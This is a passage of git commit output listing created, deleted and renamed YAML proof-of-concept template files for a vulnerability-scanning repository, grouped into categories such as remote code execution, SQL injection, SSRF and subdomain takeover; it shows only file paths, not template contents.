poc/other/supershell-c2.yaml delete mode 100644 poc/other/supervpn-panel-10577.yaml delete mode 100644 poc/other/symantec-messaging-gateway-10610.yaml create mode 100644 poc/other/symantec-pgp-global-directory-10611.yaml delete mode 100644 poc/other/synopsys-coverity-panel.yaml create mode 100644 poc/other/tabnabbing-check-10646.yaml delete mode 100644 poc/other/teamcity-registration-enabled-10667.yaml create mode 100644 poc/other/teamcity-registration-enabled.yaml create mode 100644 poc/other/teamforge-panel.yaml create mode 100644 poc/other/tekon-info-leak-10685.yaml delete mode 100644 poc/other/teradici-pcoip.yaml delete mode 100644 poc/other/terraform-enterprise-panel-10710.yaml create mode 100644 poc/other/terraform-enterprise-panel-10711.yaml delete mode 100644 poc/other/thinkcmf-arbitrary-code-execution-10715.yaml create mode 100644 poc/other/thinkcmf-arbitrary-code-execution.yaml delete mode 100644 poc/other/thinkcmf_include.yaml create mode 100644 poc/other/tibco-spotfire-panel.yaml create mode 100644 poc/other/tigase-xmpp-server.yaml create mode 100644 poc/other/tileserver-gl.yaml delete mode 100644 poc/other/tor-socks-proxy-10811.yaml delete mode 100644 poc/other/traefik-dashboard-10832.yaml create mode 100644 poc/other/traefik-dashboard-10834.yaml create mode 100644 poc/other/tuxedo-connected-controller-10852.yaml delete mode 100644 poc/other/tuxedo-connected-controller-10855.yaml delete mode 100644 poc/other/upnp-device-10982.yaml delete mode 100644 poc/other/ups-status-10983.yaml create mode 100644 poc/other/ups-status-10985.yaml delete mode 100644 poc/other/veriz0wn-osint.yaml rename poc/other/{voipmonitor-workflow-11065.yaml => voipmonitor-workflow-11064.yaml} (100%) delete mode 100644 poc/other/voipmonitor-workflow.yaml delete mode 100644 poc/other/wallix-accessmanager-panel-11094.yaml create mode 100644 poc/other/wallix-accessmanager-panel-11095.yaml delete mode 100644 poc/other/wazuh-panel-11113.yaml create mode 100644 
poc/other/wazuh-panel-11114.yaml rename poc/other/{wireless-leakage(1).yaml => wireless-leakage.yaml} (100%) create mode 100644 poc/other/wooyun-2015-148227(1).yaml delete mode 100644 poc/other/workspace-one-uem-11393.yaml create mode 100644 poc/other/workspace-one-uem-11394.yaml delete mode 100644 poc/other/wowza-streaming-engine-11399.yaml delete mode 100644 poc/other/wso2-2019-0598-11635.yaml delete mode 100644 poc/other/wso2-management-console-11644.yaml create mode 100644 poc/other/wso2-management-console-11647.yaml rename poc/other/{wso2mgmtconsole(1).yaml => wso2mgmtconsole.yaml} (100%) create mode 100644 poc/other/yarn-lock.yaml create mode 100644 poc/other/yongyou-eltextfile.yaml delete mode 100644 poc/other/yopass-panel-11749.yaml create mode 100644 poc/other/yopass-panel-11750.yaml create mode 100644 poc/other/zhiyuan-oa-info-leak-11799.yaml delete mode 100644 poc/other/zhiyuan-oa-info-leak-11800.yaml create mode 100644 poc/other/zhongkewangwei-fileread.yaml create mode 100644 poc/other/zuul-panel-11843.yaml create mode 100644 poc/perl/perl-status-9487.yaml create mode 100644 poc/php/clockwork-php-page-1016.yaml rename poc/php/{php-backup-files-9497.yaml => php-backup-files-9498.yaml} (100%) delete mode 100644 poc/php/php-errors-9511.yaml delete mode 100644 poc/php/php-errors.yaml delete mode 100644 poc/php/php-proxy-detect.yaml create mode 100644 poc/php/php-scanner.yaml rename poc/php/{php-zerodium-backdoor-rce-9569.yaml => php-zerodium-backdoor-rce-9572.yaml} (100%) delete mode 100644 poc/php/php-zerodium-backdoor-rce.yaml create mode 100644 poc/php/phpcollab-detect-9499.yaml create mode 100644 poc/php/phpcollab-workflow-9502.yaml delete mode 100644 poc/php/phpcollab-workflow-9503.yaml delete mode 100644 poc/php/phpinfo-9520.yaml create mode 100644 poc/php/phpldapadmin-panel.yaml delete mode 100644 poc/php/phpmyadmin-setup-9531.yaml create mode 100644 poc/php/phpmyadmin-setup-9532.yaml delete mode 100644 poc/php/phpmyadmin-sql-9534.yaml create mode 
100644 poc/php/phpunit-9556.yaml delete mode 100644 poc/php/phpunit.yaml delete mode 100644 poc/php/thinkphp-2-rce-10740.yaml delete mode 100644 poc/php/thinkphp-501-rce-10743.yaml create mode 100644 poc/php/thinkphp-501-rce.yaml create mode 100644 poc/php/thinkphp-5022-rce-10744.yaml rename poc/php/{thinkphp-5022-rce.yaml => thinkphp-5022-rce-10747.yaml} (100%) delete mode 100644 poc/php/thinkphp-5023-rce-10748.yaml delete mode 100644 poc/php/thinkphp-509-information-disclosure-10755.yaml create mode 100644 poc/php/twig-php-ssti-10856.yaml delete mode 100644 poc/php/wp-phpfreechat-xss-11524.yaml create mode 100644 poc/python/autobahn-python-detect-594.yaml delete mode 100644 poc/python/autobahn-python-detect-595.yaml create mode 100644 poc/python/django-admin-panel-7023.yaml create mode 100644 poc/python/django-debug-exposed-404.yaml delete mode 100644 poc/python/django-framework-exceptions.yaml delete mode 100644 poc/python/django-secret-key.yaml create mode 100644 poc/python/django-secret.key.yaml delete mode 100644 poc/python/jupyter-ipython-unauth-8402.yaml delete mode 100644 poc/python/python-metrics.yaml create mode 100644 poc/python/python-scanner-9748.yaml delete mode 100644 poc/python/python-scanner.yaml delete mode 100644 poc/rabbitmq/rabbitmq-dashboard-9776.yaml create mode 100644 poc/rabbitmq/rabbitmq-dashboard-9779.yaml create mode 100644 poc/rabbitmq/rabbitmq-default-admin-9780.yaml delete mode 100644 poc/rabbitmq/rabbitmq-default-admin-9782.yaml create mode 100644 poc/redis/exposed-redis-7339.yaml delete mode 100644 poc/remote_code_execution/apache-flink-unauth-rce-355.yaml delete mode 100644 poc/remote_code_execution/apache-httpd-rce-362.yaml create mode 100644 poc/remote_code_execution/apache-solr-log4j-rce-372.yaml delete mode 100644 poc/remote_code_execution/cisco-cloudcenter-suite-log4j-rce.yaml create mode 100644 poc/remote_code_execution/cisco-cloudcenter-suite-rce.yaml rename poc/remote_code_execution/{code42-log4j-rce-1131.yaml => 
code42-log4j-rce.yaml} (100%) rename poc/remote_code_execution/{core-chuangtian-cloud-rce-1207.yaml => core-chuangtian-cloud-rce-1211.yaml} (100%) delete mode 100644 poc/remote_code_execution/elex-woocommerce-xss-7199.yaml create mode 100644 poc/remote_code_execution/elex-woocommerce-xss.yaml create mode 100644 poc/remote_code_execution/eyou-email-rce-7380.yaml create mode 100644 poc/remote_code_execution/eyou-email-rce-7382.yaml delete mode 100644 poc/remote_code_execution/fastjson-1-2-24-rce.yaml create mode 100644 poc/remote_code_execution/fastjson-1-2-41-rce.yaml rename poc/remote_code_execution/{fastjson-1-2-42-rce.yaml => fastjson-1-2-42-rce-7408.yaml} (100%) create mode 100644 poc/remote_code_execution/fastjson-1-2-43-rce-7412.yaml create mode 100644 poc/remote_code_execution/fastjson-1-2-62-rce-7419.yaml delete mode 100644 poc/remote_code_execution/icewarp-webclient-rce-8133.yaml create mode 100644 poc/remote_code_execution/jamf-log4j-jndi-rce-8214.yaml delete mode 100644 poc/remote_code_execution/jamf-log4j-jndi-rce.yaml delete mode 100644 poc/remote_code_execution/lotuscms-rce-8650.yaml create mode 100644 poc/remote_code_execution/lotuscms-rce-8652.yaml create mode 100644 poc/remote_code_execution/metersphere-plugin-rce.yaml delete mode 100644 poc/remote_code_execution/mirai-unknown-rce-8899.yaml delete mode 100644 poc/remote_code_execution/nuuo-nvrmini2-rce-9170.yaml create mode 100644 poc/remote_code_execution/optilink-ont1gew-gpon-rce-9343.yaml create mode 100644 poc/remote_code_execution/panabit-sy_addmount-rce.yaml create mode 100644 poc/remote_code_execution/pdf-signer-ssti-to-rce-9470.yaml delete mode 100644 poc/remote_code_execution/pdf-signer-ssti-to-rce-9472.yaml rename poc/remote_code_execution/{phalcon-framework-source.yaml => phalcon-framework-source-9494.yaml} (100%) delete mode 100644 poc/remote_code_execution/phalcon-framework-source-9496.yaml rename poc/remote_code_execution/{php-zerodium-backdoor-rce-9569.yaml => 
php-zerodium-backdoor-rce-9572.yaml} (100%) delete mode 100644 poc/remote_code_execution/php-zerodium-backdoor-rce.yaml create mode 100644 poc/remote_code_execution/powercreator-cms-rce-9645.yaml create mode 100644 poc/remote_code_execution/powercreator-cms-rce.yaml create mode 100644 poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9758.yaml create mode 100644 poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9761.yaml delete mode 100644 poc/remote_code_execution/salesforce-aura.yaml create mode 100644 poc/remote_code_execution/sangfor-ba-rce-10020.yaml create mode 100644 poc/remote_code_execution/seacms-rce-10101.yaml create mode 100644 poc/remote_code_execution/showdoc-file-upload-rce-10227.yaml create mode 100644 poc/remote_code_execution/simple-employee-rce-10279.yaml delete mode 100644 poc/remote_code_execution/simple-employee-rce-10280.yaml rename poc/remote_code_execution/{spon-ip-rce.yaml => spon-ip-rce(1).yaml} (100%) create mode 100644 poc/remote_code_execution/sponip-network-system-ping-rce-10421.yaml rename poc/remote_code_execution/{springboot-h2-db-rce-10457.yaml => springboot-h2-db-rce.yaml} (100%) delete mode 100644 poc/remote_code_execution/tamronos-rce-10649.yaml delete mode 100644 poc/remote_code_execution/thinkphp-2-rce-10740.yaml delete mode 100644 poc/remote_code_execution/thinkphp-501-rce-10743.yaml create mode 100644 poc/remote_code_execution/thinkphp-501-rce.yaml create mode 100644 poc/remote_code_execution/thinkphp-5022-rce-10744.yaml rename poc/remote_code_execution/{thinkphp-5022-rce.yaml => thinkphp-5022-rce-10747.yaml} (100%) delete mode 100644 poc/remote_code_execution/thinkphp-5023-rce-10748.yaml create mode 100644 poc/remote_code_execution/vercel-takeover-11000.yaml delete mode 100644 poc/remote_code_execution/vercel-takeover-11001.yaml create mode 100644 poc/remote_code_execution/vmware-horizon-log4j-jndi-rce.yaml delete mode 100644 poc/remote_code_execution/webui-rce-11170.yaml create 
mode 100644 poc/remote_code_execution/webui-rce-11174.yaml delete mode 100644 poc/remote_code_execution/wordpress-woocommerce-listing-11339.yaml create mode 100644 poc/remote_code_execution/wordpress-woocommerce-listing-11341.yaml delete mode 100644 poc/remote_code_execution/wordpress-woocommerce-sqli-11345.yaml create mode 100644 poc/remote_code_execution/wp-force-ssl.yaml create mode 100644 poc/remote_code_execution/wp-woocommerce-file-download-11620.yaml delete mode 100644 poc/remote_code_execution/wp-woocommerce-file-download.yaml create mode 100644 poc/remote_code_execution/yapi-rce-11725.yaml create mode 100644 poc/ruby/rails-debug-mode-9806.yaml delete mode 100644 poc/ruby/rails-debug-mode-9807.yaml delete mode 100644 poc/ruby/rails-secret-token-disclosure-9809.yaml create mode 100644 poc/ruby/rails-secret-token-disclosure-9810.yaml delete mode 100644 poc/samba/samba-config-9987.yaml create mode 100644 poc/samba/samba-config.yaml delete mode 100644 poc/sap/sap-netweaver-detect-10047.yaml create mode 100644 poc/sap/sap-netweaver-info-leak-10051.yaml delete mode 100644 poc/sap/sap-netweaver-info-leak-10052.yaml delete mode 100644 poc/sap/sap-netweaver-webgui.yaml delete mode 100644 poc/sap/sap-recon-detect-10063.yaml delete mode 100644 poc/sap/sap-redirect.yaml create mode 100644 poc/sap/sap-web-dispatcher-admin-portal-10071.yaml create mode 100644 poc/sap/sapfiori-panel-10033.yaml delete mode 100644 poc/sap/sapfiori-panel-10034.yaml create mode 100644 poc/search/aws-opensearch-login-649.yaml delete mode 100644 poc/search/aws-opensearch-login-650.yaml create mode 100644 poc/search/elasticsearch-sql-client-detect-7190.yaml delete mode 100644 poc/search/searches.yaml delete mode 100644 poc/sensitive/sensitive-storage-exposure.yaml delete mode 100644 poc/sensitive/zenphoto-installation-sensitive-info.yaml create mode 100644 poc/sensitive/zenphoto-sensitive-info-11784.yaml delete mode 100644 poc/sharepoint/exposed-sharepoint-list-7345.yaml create mode 100644 
poc/shopify/shopify-custom-token(1).yaml delete mode 100644 poc/shopify/shopify-custom-token-10198.yaml delete mode 100644 poc/shopify/shopify-private-token-11861.yaml delete mode 100644 poc/shopify/shopify-takeover-10201.yaml create mode 100644 poc/smtp/easy-wp-smtp-listing-7156.yaml delete mode 100644 poc/smtp/easy-wp-smtp-listing-7157.yaml create mode 100644 poc/smtp/msmtp-config-8967.yaml create mode 100644 poc/social/flow-flow-social-stream-xss-7524.yaml delete mode 100644 poc/social/flow-flow-social-stream-xss.yaml delete mode 100644 poc/social/linkedin-id-11853.yaml create mode 100644 poc/social/sassy-social-share-10083.yaml rename poc/social/{sassy-social-share-10087.yaml => sassy-social-share.yaml} (100%) rename poc/sql/{74cms-sqli-10.yaml => 74cms-sqli.yaml} (100%) rename poc/sql/{android-debug-database-exposed-316.yaml => android-debug-database-exposed-314.yaml} (100%) rename poc/sql/{api-abuseipdb-384.yaml => api-abuseipdb-385.yaml} (100%) create mode 100644 poc/sql/api-abuseipdb.yaml create mode 100644 poc/sql/buildbot-panel-803.yaml delete mode 100644 poc/sql/chamilo-lms-sqli-892.yaml create mode 100644 poc/sql/chamilo-lms-sqli.yaml create mode 100644 poc/sql/chanjet-crm-sqli.yaml create mode 100644 poc/sql/couchdb-adminparty-1237.yaml delete mode 100644 poc/sql/couchdb-exposure-1238.yaml create mode 100644 poc/sql/couchdb-exposure-1239.yaml delete mode 100644 poc/sql/db-backup-lfi-6774.yaml create mode 100644 poc/sql/db-backup-lfi-6775.yaml create mode 100644 poc/sql/db-schema-6783.yaml delete mode 100644 poc/sql/dbeaver-credentials-6780.yaml rename poc/sql/{dedecms-membergroup-sqli.yaml => dedecms-membergroup-sqli-6796.yaml} (100%) delete mode 100644 poc/sql/dotnetcms-sqli.yaml create mode 100644 poc/sql/duomicms-sql-injection-7124.yaml create mode 100644 poc/sql/duomicms-sql-injection.yaml create mode 100644 poc/sql/ecology-syncuserinfo-sqli.yaml create mode 100644 poc/sql/elasticsearch-sql-client-detect-7190.yaml create mode 100644 
poc/sql/etouch-v2-sqli-7266.yaml create mode 100644 poc/sql/exposed-adb-7282.yaml create mode 100644 poc/sql/glpi-9.3.3-sql-injection.yaml delete mode 100644 poc/sql/kevinlab-bems-sqli-8457.yaml create mode 100644 poc/sql/mdb-database-file-8795.yaml delete mode 100644 poc/sql/mdb-database-file-8796.yaml create mode 100644 poc/sql/mongodb-detect-8920.yaml delete mode 100644 poc/sql/mongodb-unauth-8925.yaml create mode 100644 poc/sql/odoo-database-manager-9204.yaml delete mode 100644 poc/sql/odoo-database-manager-9205.yaml delete mode 100644 poc/sql/openerp-database-9275.yaml create mode 100644 poc/sql/openerp-database-9277.yaml delete mode 100644 poc/sql/oracle-dbass-detect-9351.yaml delete mode 100644 poc/sql/oracle-dbass-detect.yaml delete mode 100644 poc/sql/oracle-ebs-sqllog-disclosure-9369.yaml create mode 100644 poc/sql/pbootcms-database-file-download-9469.yaml delete mode 100644 poc/sql/phpmyadmin-sql-9534.yaml create mode 100644 poc/sql/pikpikcusqli.yaml create mode 100644 poc/sql/quick-cms-sqli.yaml create mode 100644 poc/sql/seacms-sqli-10103.yaml rename poc/sql/{springboot-h2-db-rce-10457.yaml => springboot-h2-db-rce.yaml} (100%) delete mode 100644 poc/sql/sql-server-reporting-10509.yaml delete mode 100644 poc/sql/sqli_header-10504.yaml create mode 100644 poc/sql/suspicious-sql-error-messages.yaml delete mode 100644 poc/sql/symfony-database-config-10616.yaml rename poc/sql/{symfony-database-config.yaml => symfony-database-config-10617.yaml} (100%) rename poc/sql/{thumbs-db-disclosure.yaml => thumbs-db-disclosure-10763.yaml} (100%) create mode 100644 poc/sql/tidb-unauth-10770.yaml delete mode 100644 poc/sql/tidb-unauth-10772.yaml create mode 100644 poc/sql/ucmdb-default-login-10871.yaml rename poc/sql/{ucmdb-default-login-10869.yaml => ucmdb-default-login.yaml} (100%) create mode 100644 poc/sql/unauthenticated-influxdb-10903.yaml create mode 100644 poc/sql/wordpress-db-repair-11252.yaml delete mode 100644 poc/sql/wordpress-woocommerce-sqli-11345.yaml 
delete mode 100644 poc/sql/xdcms-sqli-11664.yaml create mode 100644 poc/sql/yongyou-jdbcread.yaml delete mode 100644 poc/sql/zcms-v3-sqli-11773.yaml rename poc/sql_injection/{74cms-sqli-10.yaml => 74cms-sqli.yaml} (100%) delete mode 100644 poc/sql_injection/chamilo-lms-sqli-892.yaml create mode 100644 poc/sql_injection/chamilo-lms-sqli.yaml create mode 100644 poc/sql_injection/chanjet-crm-sqli.yaml rename poc/sql_injection/{dedecms-membergroup-sqli.yaml => dedecms-membergroup-sqli-6796.yaml} (100%) delete mode 100644 poc/sql_injection/dotnetcms-sqli.yaml create mode 100644 poc/sql_injection/ecology-syncuserinfo-sqli.yaml create mode 100644 poc/sql_injection/etouch-v2-sqli-7266.yaml delete mode 100644 poc/sql_injection/kevinlab-bems-sqli-8457.yaml create mode 100644 poc/sql_injection/quick-cms-sqli.yaml create mode 100644 poc/sql_injection/seacms-sqli-10103.yaml create mode 100644 poc/sql_injection/sqli.yaml delete mode 100644 poc/sql_injection/sqli_header-10504.yaml delete mode 100644 poc/sql_injection/wordpress-woocommerce-sqli-11345.yaml delete mode 100644 poc/sql_injection/xdcms-sqli-11664.yaml delete mode 100644 poc/sql_injection/zcms-v3-sqli-11773.yaml create mode 100644 poc/ssrf/cloudflare-image-ssrf-1021.yaml create mode 100644 poc/ssrf/confluence-ssrf-sharelinks-1192.yaml delete mode 100644 poc/ssrf/confluence-ssrf-sharelinks-1193.yaml create mode 100644 poc/ssrf/hasura-graphql-ssrf-7905.yaml delete mode 100644 poc/ssrf/openbmcs-ssrf-9261.yaml create mode 100644 poc/ssrf/openbmcs-ssrf.yaml delete mode 100644 poc/ssrf/umbraco-base-ssrf.yaml rename poc/ssrf/{w3c-total-cache-ssrf-11080.yaml => w3c-total-cache-ssrf-11077.yaml} (100%) create mode 100644 poc/ssrf/wp-multiple-theme-ssrf-11513.yaml delete mode 100644 poc/ssrf/yongyou-ssrf-11745.yaml create mode 100644 poc/ssrf/zimbra-preauth-ssrf.yaml create mode 100644 poc/subdomain_takeover/aftership-takeover-205.yaml create mode 100644 poc/subdomain_takeover/agilecrm-takeover-208.yaml create mode 100644 
poc/subdomain_takeover/aha-takeover-216.yaml rename poc/subdomain_takeover/{airee-takeover-228.yaml => airee-takeover-226.yaml} (100%) delete mode 100644 poc/subdomain_takeover/anima-takeover-318.yaml create mode 100644 poc/subdomain_takeover/anima-takeover-319.yaml delete mode 100644 poc/subdomain_takeover/bigcartel-takeover-727.yaml create mode 100644 poc/subdomain_takeover/bigcartel-takeover-728.yaml create mode 100644 poc/subdomain_takeover/bitbucket-takeover-738.yaml delete mode 100644 poc/subdomain_takeover/bitbucket-takeover-740.yaml create mode 100644 poc/subdomain_takeover/brightcove-takeover-783.yaml create mode 100644 poc/subdomain_takeover/brightcove-takeover-784.yaml delete mode 100644 poc/subdomain_takeover/brightcove-takeover-785.yaml rename poc/subdomain_takeover/{canny-takeover-857.yaml => canny-takeover-854.yaml} (100%) create mode 100644 poc/subdomain_takeover/cargo-takeover-867.yaml delete mode 100644 poc/subdomain_takeover/cargo-takeover-868.yaml delete mode 100644 poc/subdomain_takeover/cargocollective-takeover-862.yaml create mode 100644 poc/subdomain_takeover/cargocollective-takeover-863.yaml create mode 100644 poc/subdomain_takeover/elasticbeantalk-takeover-7188.yaml create mode 100644 poc/subdomain_takeover/flexbe-takeover-7505.yaml create mode 100644 poc/subdomain_takeover/flywheel-takeover-7525.yaml delete mode 100644 poc/subdomain_takeover/freshdesk-takeover-7540.yaml create mode 100644 poc/subdomain_takeover/freshdesk-takeover-7541.yaml create mode 100644 poc/subdomain_takeover/frontify-takeover-7542.yaml create mode 100644 poc/subdomain_takeover/gemfury-takeover-7578.yaml delete mode 100644 poc/subdomain_takeover/getresponse-takeover-7607.yaml create mode 100644 poc/subdomain_takeover/getresponse-takeover-7609.yaml create mode 100644 poc/subdomain_takeover/ghost-takeover-7619.yaml delete mode 100644 poc/subdomain_takeover/ghost-takeover-7621.yaml create mode 100644 poc/subdomain_takeover/gitbook-takeover-7627.yaml create mode 100644 
poc/subdomain_takeover/hatenablog-takeover-7907.yaml delete mode 100644 poc/subdomain_takeover/helpjuice-takeover-7925.yaml create mode 100644 poc/subdomain_takeover/helpjuice-takeover-7926.yaml create mode 100644 poc/subdomain_takeover/helprace-takeover-7930.yaml delete mode 100644 poc/subdomain_takeover/helprace-takeover-7932.yaml create mode 100644 poc/subdomain_takeover/helpscout-takeover-7936.yaml delete mode 100644 poc/subdomain_takeover/heroku-takeover-7944.yaml create mode 100644 poc/subdomain_takeover/intercom-takeover-8166.yaml delete mode 100644 poc/subdomain_takeover/intercom-takeover-8167.yaml create mode 100644 poc/subdomain_takeover/jazzhr-takeover-8235.yaml create mode 100644 poc/subdomain_takeover/jetbrains-takeover-8292.yaml delete mode 100644 poc/subdomain_takeover/kinsta-takeover-8495.yaml create mode 100644 poc/subdomain_takeover/landingi-takeover-8566.yaml delete mode 100644 poc/subdomain_takeover/landingi-takeover-8567.yaml delete mode 100644 poc/subdomain_takeover/launchrock-takeover-8602.yaml delete mode 100644 poc/subdomain_takeover/launchrock-takeover-8605.yaml delete mode 100644 poc/subdomain_takeover/ngrok-takeover-9126.yaml create mode 100644 poc/subdomain_takeover/ngrok-takeover-9128.yaml delete mode 100644 poc/subdomain_takeover/pantheon-takeover-9459.yaml delete mode 100644 poc/subdomain_takeover/pingdom-takeover-9584.yaml create mode 100644 poc/subdomain_takeover/pingdom-takeover-9586.yaml delete mode 100644 poc/subdomain_takeover/proposify-takeover-9695.yaml create mode 100644 poc/subdomain_takeover/proposify-takeover-9696.yaml create mode 100644 poc/subdomain_takeover/readme-takeover-9842.yaml delete mode 100644 poc/subdomain_takeover/readthedocs-takeover-9844.yaml create mode 100644 poc/subdomain_takeover/readthedocs-takeover-9846.yaml delete mode 100644 poc/subdomain_takeover/s3-subtakeover-9968.yaml create mode 100644 poc/subdomain_takeover/s3-subtakeover-9969.yaml delete mode 100644 
poc/subdomain_takeover/shopify-takeover-10201.yaml delete mode 100644 poc/subdomain_takeover/simplebooklet-takeover-10272.yaml create mode 100644 poc/subdomain_takeover/simplebooklet-takeover-10274.yaml rename poc/subdomain_takeover/{smartjob-takeover-10324.yaml => smartjob-takeover-10322.yaml} (100%) rename poc/subdomain_takeover/{smartling-takeover-10326.yaml => smartling-takeover-10327.yaml} (100%) delete mode 100644 poc/subdomain_takeover/smugmug-takeover-10338.yaml create mode 100644 poc/subdomain_takeover/smugmug-takeover-10339.yaml create mode 100644 poc/subdomain_takeover/strikingly-takeover-10551.yaml delete mode 100644 poc/subdomain_takeover/surge-takeover-10578.yaml create mode 100644 poc/subdomain_takeover/tave-takeover-10660.yaml delete mode 100644 poc/subdomain_takeover/tave-takeover-10662.yaml rename poc/subdomain_takeover/{teamwork-takeover-10670.yaml => teamwork-takeover-10668.yaml} (100%) create mode 100644 poc/subdomain_takeover/tictail-takeover-10766.yaml delete mode 100644 poc/subdomain_takeover/tictail-takeover-10767.yaml rename poc/subdomain_takeover/{tilda-takeover-10781.yaml => tilda-takeover-10783.yaml} (100%) create mode 100644 poc/subdomain_takeover/tumblr-takeover-10845.yaml delete mode 100644 poc/subdomain_takeover/tumblr-takeover-10847.yaml rename poc/subdomain_takeover/{unbounce-takeover-10971.yaml => unbounce-takeover-10970.yaml} (100%) rename poc/subdomain_takeover/{uptimerobot-takeover-10989.yaml => uptimerobot-takeover-10987.yaml} (100%) delete mode 100644 poc/subdomain_takeover/vend-takeover-10996.yaml create mode 100644 poc/subdomain_takeover/vend-takeover-10998.yaml create mode 100644 poc/subdomain_takeover/vercel-takeover-11000.yaml delete mode 100644 poc/subdomain_takeover/vercel-takeover-11001.yaml delete mode 100644 poc/subdomain_takeover/webflow-takeover-11131.yaml create mode 100644 poc/subdomain_takeover/webflow-takeover-11133.yaml create mode 100644 poc/subdomain_takeover/wishpond-takeover-11216.yaml delete mode 100644 
poc/subdomain_takeover/wishpond-takeover-11217.yaml create mode 100644 poc/subdomain_takeover/wordpress-takeover-11312.yaml delete mode 100644 poc/subdomain_takeover/wordpress-takeover-11313.yaml create mode 100644 poc/subdomain_takeover/wufoo-takeover-11648.yaml delete mode 100644 poc/subdomain_takeover/wufoo-takeover-11649.yaml delete mode 100644 poc/subdomain_takeover/zendesk-takeover-11780.yaml create mode 100644 poc/subdomain_takeover/zendesk-takeover-11781.yaml create mode 100644 poc/template_injection/pdf-signer-ssti-to-rce-9470.yaml delete mode 100644 poc/template_injection/pdf-signer-ssti-to-rce-9472.yaml create mode 100644 poc/template_injection/pikpikcussti.yaml create mode 100644 poc/template_injection/twig-php-ssti-10856.yaml delete mode 100644 poc/upload/exposed-jquery-file-upload.yaml rename poc/upload/{oa-v9-uploads-file-9190.yaml => oa-v9-uploads-file-9191.yaml} (100%) rename poc/upload/{oa-v9-uploads-file-9189.yaml => oa-v9-uploads-file.yaml} (100%) create mode 100644 poc/upload/showdoc-file-upload-rce-10227.yaml create mode 100644 poc/upload/unauthenticated-popup-upload-10921.yaml rename poc/upload/{unauthenticated-popup-upload-10922.yaml => unauthenticated-popup-upload.yaml} (100%) rename poc/vmware/{vmware-horizon-11041.yaml => vmware-horizon-11040.yaml} (100%) create mode 100644 poc/vmware/vmware-horizon-log4j-jndi-rce.yaml delete mode 100644 poc/vmware/vmware-vcenter-lfi-11047.yaml create mode 100644 poc/vmware/vmware-vcenter-lfi.yaml rename poc/vmware/{vmware-vrealize-detect-11057.yaml => vmware-vrealize-detect.yaml} (100%) rename poc/vmware/{vmware-workflow-11059.yaml => vmware-workflow-11060.yaml} (100%) create mode 100644 poc/vmware/vmware-workflow.yaml delete mode 100644 poc/web/alphaweb-default-login.yaml delete mode 100644 poc/web/artica-web-proxy-detect-545.yaml rename poc/web/{artica-web-proxy-detect-543.yaml => artica-web-proxy-detect.yaml} (100%) delete mode 100644 poc/web/axigen-webadmin-660.yaml delete mode 100644 
poc/web/axigen-webmail.yaml delete mode 100644 poc/web/azkaban-web-client-676.yaml create mode 100644 poc/web/azkaban-web-client-680.yaml create mode 100644 poc/web/boa-web-fileread-11846.yaml create mode 100644 poc/web/boa-web-server.yaml create mode 100644 poc/web/cobbler-webgui-1123.yaml delete mode 100644 poc/web/cobbler-webgui-1124.yaml create mode 100644 poc/web/codemeter-webadmin-panel-1135.yaml delete mode 100644 poc/web/codemeter-webadmin-panel-1138.yaml create mode 100644 poc/web/exposed-webalizer-7358.yaml delete mode 100644 poc/web/exposed-webalizer-7360.yaml create mode 100644 poc/web/hashicorp-consul-webgui-7896.yaml delete mode 100644 poc/web/honeywell-web-controller-7996.yaml delete mode 100644 poc/web/icewarp-webclient-rce-8133.yaml create mode 100644 poc/web/icinga-web-login-8134.yaml delete mode 100644 poc/web/icinga-web-login-8137.yaml delete mode 100644 poc/web/iplanet-web-server-8190.yaml create mode 100644 poc/web/iplanet-web-server-8191.yaml create mode 100644 poc/web/keenetic-web-login-8442.yaml delete mode 100644 poc/web/keenetic-web-login-8443.yaml create mode 100644 poc/web/oracle-iplanet-web-server-9392.yaml delete mode 100644 poc/web/oracle-iplanet-web-server.yaml create mode 100644 poc/web/saia-web-server-info.yaml delete mode 100644 poc/web/sap-netweaver-webgui.yaml create mode 100644 poc/web/sap-web-dispatcher-admin-portal-10071.yaml create mode 100644 poc/web/slack-webhook(1).yaml delete mode 100644 poc/web/slack-webhook-11865.yaml create mode 100644 poc/web/spark-webui-unauth-10401.yaml delete mode 100644 poc/web/web-config-11125.yaml delete mode 100644 poc/web/web-ftp-detect-11136.yaml create mode 100644 poc/web/web-local-craft-11139.yaml delete mode 100644 poc/web/web-local-craft-11141.yaml create mode 100644 poc/web/web-suite-detect-11168.yaml delete mode 100644 poc/web/web-suite-detect.yaml delete mode 100644 poc/web/webcamxp-5-11122.yaml create mode 100644 poc/web/webcamxp-5.yaml delete mode 100644 
poc/web/webeditors-11129.yaml delete mode 100644 poc/web/webflow-takeover-11131.yaml create mode 100644 poc/web/webflow-takeover-11133.yaml rename poc/web/{weblogic-t3-detect-11152.yaml => weblogic-t3-detect-11153.yaml} (100%) delete mode 100644 poc/web/weblogic-weak-login-11154.yaml create mode 100644 poc/web/webmodule-ee-11162.yaml delete mode 100644 poc/web/webmodule-ee-11164.yaml rename poc/web/{webmodule-ee-panel-11160.yaml => webmodule-ee-panel-11161.yaml} (100%) delete mode 100644 poc/web/webui-rce-11170.yaml create mode 100644 poc/web/webui-rce-11174.yaml rename poc/web/{webview-addjavascript-interface-11177.yaml => webview-addjavascript-interface-11176.yaml} (100%) create mode 100644 poc/web/webview-load-url-11180.yaml delete mode 100644 poc/web/webview-load-url-11182.yaml delete mode 100644 poc/web/xp-webcam.yaml delete mode 100644 poc/wordpress/alfacgiapi-wordpress.yaml create mode 100644 poc/wordpress/easy-wp-smtp-listing-7156.yaml delete mode 100644 poc/wordpress/easy-wp-smtp-listing-7157.yaml create mode 100644 poc/wordpress/feedwordpress-xss-7459.yaml delete mode 100644 poc/wordpress/nativechurch-wp-theme-lfd-9001.yaml delete mode 100644 poc/wordpress/trilithic-viewpoint-default-10835.yaml delete mode 100644 poc/wordpress/viewpoint-system-status-11019.yaml delete mode 100644 poc/wordpress/wordpress-accessible-wpconfig-11235.yaml delete mode 100644 poc/wordpress/wordpress-affiliatewp-log-11240.yaml create mode 100644 poc/wordpress/wordpress-affiliatewp-log-11242.yaml create mode 100644 poc/wordpress/wordpress-bbpress-plugin-listing.yaml create mode 100644 poc/wordpress/wordpress-db-repair-11252.yaml rename poc/wordpress/{wordpress-debug-log-11258.yaml => wordpress-debug-log-11259.yaml} (100%) rename poc/wordpress/{wordpress-detect-11261.yaml => wordpress-detect-11260.yaml} (100%) delete mode 100644 poc/wordpress/wordpress-emergency-script-11272.yaml create mode 100644 poc/wordpress/wordpress-emergency-script-11275.yaml delete mode 100644 
